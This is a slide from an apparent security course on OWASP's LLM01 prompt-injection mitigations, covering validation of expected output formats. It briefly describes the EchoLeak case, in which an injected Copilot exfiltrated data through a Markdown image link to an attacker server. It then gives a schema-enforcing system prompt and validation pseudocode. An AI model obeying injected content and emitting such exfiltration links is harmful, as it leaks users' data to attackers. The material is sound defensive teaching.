LLM01:2025 — Prompt Injection

Slide 20 · Mitigation 2 of 7

Define and validate expected output formats.

Know exactly what the AI should output — and catch it when injection changes that.

📄 OWASP LLM Top 10:2025 · LLM01 Prevention #2

OWASP M2

Define and Validate Expected Output Formats

What OWASP Says

"Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats."

How People Do This Wrong — EchoLeak Was This

EchoLeak's exfiltration channel was a Markdown image link in Copilot's output pointing to an attacker server. If output had been validated for unauthorized external URLs before being rendered, the data channel would have been blocked — even after the injection succeeded and even without a server-side patch.

Passing AI output directly to downstream rendering, email senders, or database writes without a validation step is one of the most common AI security gaps.

How to Do This Right

// System prompt: enforce a schema "Respond ONLY in this JSON format: { 'status': 'found' or 'not_found', 'order_id': string, 'message': string (max 200 chars, no URLs) } Never include external links, image tags, or content outside this schema." // Code validates before rendering response = call_llm(prompt) if not matches_schema(response, ORDER_SCHEMA): log_anomaly(response) return safe_fallback() if contains_external_url(response): block_and_alert(response)

How to Validate

Inject and verify the output validation catches it — independently from whether the model resisted. Test with outputs containing external URLs, unexpected JSON fields, HTML, and Markdown links. Both layers (model constraint + code validation) must work independently.

← Back Next → M3: Filtering + real tools